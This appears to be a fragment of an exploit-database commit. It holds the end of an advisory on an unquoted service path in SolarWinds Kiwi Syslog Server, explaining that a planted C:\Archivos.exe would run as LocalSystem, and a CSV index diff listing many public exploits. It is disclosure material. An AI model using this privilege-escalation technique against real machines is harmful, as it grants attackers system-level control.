 [SC] GetServiceConfig SUCCESS
 SERVICE_NAME: Kiwi Syslog Server
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Archivos de programa\Syslogd\Syslogd_Service.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Kiwi Syslog Server
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
 # Exploit
 Using the BINARY_PATH_NAME listed above, an executable named "Archivos.exe" 
 could be placed in "C:\", and it would be executed as the Local System user 
 next time the service was restarted.
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -10755,6 +10755,8 @@ id,file,description,date,author,type,platform,port
 47593,exploits/windows/local/47593.txt,"Wacom WTabletService 6.6.7-3 - 'WTabletServicePro' Unquoted Service Path",2019-11-06,"Marcos Antonio León",local,windows,
 47594,exploits/windows/local/47594.txt,"QNAP NetBak Replicator 4.5.6.0607 - 'QVssService' Unquoted Service Path",2019-11-06,"Ivan Marmolejo",local,windows,
 47597,exploits/windows/local/47597.txt,"Adaware Web Companion version 4.8.2078.3950 - 'WCAssistantService' Unquoted Service Path",2019-11-07,"Mariela L Martínez Hdez",local,windows,
 47599,exploits/windows/local/47599.txt,"SolarWinds Kiwi Syslog Server 8.3.52 - 'Kiwi Syslog Server' Unquoted Service Path",2019-11-08,"Carlos A Garcia R",local,windows,
 47601,exploits/android/local/47601.rb,"Android Janus - APK Signature Bypass (Metasploit)",2019-11-08,Metasploit,local,android,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -17763,6 +17765,7 @@ id,file,description,date,author,type,platform,port
 47566,exploits/hardware/remote/47566.cpp,"MikroTik RouterOS 6.45.6 - DNS Cache Poisoning",2019-10-31,"Jacob Baines",remote,hardware,
 47573,exploits/multiple/remote/47573.rb,"Nostromo - Directory Traversal Remote Command Execution (Metasploit)",2019-11-01,Metasploit,remote,multiple,
 47576,exploits/windows/remote/47576.py,"Ayukov NFTP client 1.71 - 'SYST' Buffer Overflow",2019-11-04,SYANiDE,remote,windows,
 47602,exploits/linux/remote/47602.rb,"rConfig - install Command Execution (Metasploit)",2019-11-08,Metasploit,remote,linux,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -41914,3 +41917,6 @@ id,file,description,date,author,type,platform,port
 47589,exploits/aspx/webapps/47589.txt,"SD.NET RIM 4.7.3c - 'idtyp' SQL Injection",2019-11-05,"Fabian Mosch_ Nick Theisinger",webapps,aspx,80
 47595,exploits/hardware/webapps/47595.txt,"Smartwares HOME easy 1.0.9 - Client-Side Authentication Bypass",2019-11-06,LiquidWorm,webapps,hardware,
 47596,exploits/hardware/webapps/47596.sh,"Smartwares HOME easy 1.0.9 - Database Backup Information Disclosure",2019-11-06,LiquidWorm,webapps,hardware,
 47598,exploits/java/webapps/47598.py,"Jenkins build-metrics plugin 1.3 - 'label' Cross-Site Scripting",2019-11-08,vesche,webapps,java,
 47600,exploits/php/webapps/47600.py,"Adive Framework 2.0.7 - Privilege Escalation",2019-11-08,"Pablo Santiago",webapps,php,
 47603,exploits/php/webapps/47603.txt,"Nextcloud 17 - Cross-Site Request Forgery",2019-11-08,"Ozer Goker",webapps,php,